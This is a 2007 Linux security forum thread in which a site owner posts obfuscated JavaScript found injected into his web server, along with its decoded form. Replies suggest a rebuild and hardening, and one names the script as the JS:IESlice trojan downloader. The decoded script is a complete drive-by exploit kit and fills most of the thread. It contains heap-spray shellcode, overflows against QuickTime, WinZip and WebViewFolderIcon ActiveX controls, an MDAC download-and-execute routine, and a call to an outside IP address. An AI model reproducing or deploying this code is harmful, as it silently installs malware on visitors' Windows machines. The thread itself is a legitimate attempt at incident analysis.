unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20 %26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%7 6%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29% 20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c %3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3 d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65% 45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29 %3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%7 5%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63% 6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62 %73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%6 5%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20% 63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75 %6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%2 9%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d% 29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72 %65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%7 3%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a% 09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76 %5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%
62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f %66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%0 9%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30% 5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%7 2%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a% 0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b %0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%7 4%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44% 42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a %0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7 b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61% 74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72 %69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%0 9%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09% 09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f %62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%4 1%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09% 09%09%09%69%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b %0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%
09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69 %66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%2 6%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20% 64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77 %6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%6 5%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61% 74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72 %20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%2 2%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34% 29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28 %41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%7 6%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29% 20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28 %53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5 d%2c%20%6e%61%6d%65%2c%20%6e%29%20%3d%3d%20%31%29% 20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09 %09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0 a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%28%29%20 %7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%
43%28%29%20%29%20%7b%20%73%74%61%72%74%4f%76%65%72 %66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%7 4%61%72%74%20%28%29%3b%0a%0a%3c%2f%73%63%72%69%70% 74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c %3e%0a%0a%0a');

document.write (SB);


Cheers for any help offered

Paul
 
Old 08-04-2007, 05:39 AM   #2
kentsbest
LQ Newbie
 
Registered: Aug 2007
Posts: 3

Original Poster
Rep: Reputation: 0
If its any help the basic encryped parts when decrypted are:

<html>
<body>
<div id="mydiv"></div>

<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}

spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80 01%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef% u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66% ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087% u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615% uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0% u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7% uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba% uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc% uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba% uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403% ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019% uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4% uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1" +
OUTPUT MR2 HERE
);
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x3;
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

mem_flag = 1;
having();
return memory;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}

} catch(e) { }

if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);

} else if (num == 2) {

try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe =
OUTPUT MU2 HERE
;

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}

if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { startOverflow(0); }

}

start ();

</script>
</body>
</html>
 
Old 08-04-2007, 07:15 PM   #3
jiml8
Senior Member
 
Registered: Sep 2003
Posts: 3,171

Rep: Reputation: 116Reputation: 116
Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.

Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?

If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.
 
Old 08-04-2007, 10:33 PM   #4
Crito
Senior Member
 
Registered: Nov 2003
Location: Knoxville, TN
Distribution: Kubuntu 9.04
Posts: 1,168

Rep: Reputation: 53
Quote:
Originally Posted by kentsbest
Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.
Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.

Last edited by Crito; 08-04-2007 at 10:36 PM.
 
Old 08-04-2007, 10:53 PM   #5
blackraider
LQ Newbie
 
Registered: Apr 2006
Location: Dark Side of Linux
Distribution: Gentoo AMD64
Posts: 6

Rep: Reputation: 0
Unhappy

Maybe could help to know what the name of the virus is JS:IESlice.

With this name is detected by Avast Antivirus. Seems to be new in the city (first spots reported on July 15 or so) and exist only a few reference in the web about this trojan downloader.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
injection attacks rockymaxsource Linux - Security 5 07-13-2007 01:50 AM
Injection wolf39us Linux - Wireless Networking 6 06-27-2007 10:38 AM
Javascript character counting of a dynamic PHP-generated form benrose111488 Programming 2 06-02-2007 02:48 PM
LXer: Dynamic XForms with JavaScript and the DOM LXer Syndicated Linux News 0 11-11-2006 09:54 AM
Linux malware on the go TigerOC Linux - Networking 3 11-07-2004 02:31 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 02:11 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration